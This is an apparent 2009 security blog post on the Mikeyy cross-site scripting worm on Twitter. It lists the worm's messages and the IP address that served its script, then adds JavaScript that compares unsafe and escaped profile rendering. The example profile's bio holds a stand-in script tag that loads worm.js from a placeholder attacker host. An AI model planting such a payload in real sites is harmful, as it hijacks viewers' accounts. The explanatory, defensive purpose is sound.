Yet another Twitter worm
by Patrik, F-Secure
April 17, 2009

A new cross-site scripting worm is going around on Twitter. Just like the previous Twitter worms, it talks about Mikeyy.

Other messages posted by the worm are:

  • Twitter, this sucks! Fix your coding.
  • Twitter Security Team Really? You need to be fired.
  • Horrible Coding!
  • @oprah - sup? welcome to twitter - mikeyy
  • @aplusk - hey, homo. - mikeyy
  • @souljaboyellem - your music sucks dude. - mikeyy
  • @TheEllenShow - hey baby, love me long time? - mikeyy
  • @StephenColbert - you funny. - mikeyy
  • @cnnbrk - he's back. ;) - mikeyy
  • @nytimes - yep, it's true. - mikeyy
  • Twitter, do you know about the before_save model callback? - mikeyy
  • This exploit only affects Internet Explorer users. Thanks. - mikeyy
  • Twitter, BeforeSave: ForEach: DataArray: EscapeHtmlCars! - mikeyy
  • Get Firefox, thanks. Firefox web browser | Faster, more secure, & customizable
  • Twitter, you should be paying me now. - mikeyy
Once a user views an already infected profile, they get infected as well: the script changes their name, location, website and bio to Mikeyy, and their account starts posting messages randomly picked from the list above.

The malicious script itself is downloaded from 74.200.253.195. Twitter is working on fixing the problem.
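
The following JavaScript is an added example, not code from the F-Secure post and not Twitter's own code. It shows the mechanism behind a stored cross-site scripting worm of this kind, and the fix the worm's own messages taunt Twitter about: profile fields concatenated into HTML as-is, next to the same rendering with every field escaped on output and the website link restricted to http(s) URLs. The profile object, the field names, the script URL and the pre-save check are constructed for illustration; the payload is a stand-in, not the worm's actual script.

```javascript
// Added example: stored XSS via profile fields, vulnerable vs. hardened rendering.
// Everything below (profile, URL, field names) is constructed for illustration.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Escape every character that can open a tag or break out of a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Allow only http(s) links in href; anything else (javascript:, data:, ...) becomes '#'.
// Escaping alone does not make an href safe, so the scheme must be checked too.
function safeUrl(url) {
  const trimmed = String(url).trim();
  return /^https?:\/\//i.test(trimmed) ? trimmed : '#';
}

// Vulnerable rendering: fields go straight into the page, so a <script> stored in
// the bio runs in the browser of everyone who views the profile.
function renderProfileUnsafe(profile) {
  return '<div class="profile">' +
    `<h1>${profile.name}</h1>` +
    `<p class="location">${profile.location}</p>` +
    `<a href="${profile.website}">${profile.website}</a>` +
    `<p class="bio">${profile.bio}</p>` +
    '</div>';
}

// Hardened rendering: same template, every field escaped on output, link scheme checked.
function renderProfileSafe(profile) {
  const e = escapeHtml;
  return '<div class="profile">' +
    `<h1>${e(profile.name)}</h1>` +
    `<p class="location">${e(profile.location)}</p>` +
    `<a href="${e(safeUrl(profile.website))}">${e(profile.website)}</a>` +
    `<p class="bio">${e(profile.bio)}</p>` +
    '</div>';
}

// Constructed stand-in for an infected profile: the bio carries a script tag that
// would pull the worm from an attacker-controlled host (placeholder URL).
const infectedProfile = {
  name: 'mikeyy',
  location: 'mikeyy',
  website: 'http://attacker.invalid/',
  bio: 'mikeyy<script src="http://attacker.invalid/worm.js"></script>',
};

// Optional pre-save check (the "before_save" idea from the worm's tweets): report
// fields containing characters significant to HTML. Output escaping is the real
// fix; this only helps spot suspicious writes, and it will flag URLs with '&'.
function fieldsWithMarkup(profile) {
  return Object.keys(profile).filter((k) => /[<>"'&]/.test(profile[k]));
}

// Does rendered HTML contain an executable script element?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

console.log('unsafe render executes script:', containsScriptTag(renderProfileUnsafe(infectedProfile)));
console.log('safe render executes script:  ', containsScriptTag(renderProfileSafe(infectedProfile)));
console.log('fields carrying markup:', fieldsWithMarkup(infectedProfile));
```

The point of the comparison is that the worm needs nothing exotic: whatever a victim's browser renders from an infected profile is exactly what was stored, so the same escaping applied to every field on output (not a blacklist on input) is what stops it.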

This happens on the same day as media reports that Michael Mooney got a job because he wrote the first Twitter worms. So if he did this one too, what was the motivation? To get an even better offer from someone else! Stupid.

For now, stay away from looking at users' profiles. Firefox and NoScript is a good combo.

Updated to add: Michael Mooney (Mikeyy) confesses to writing this latest worm as well.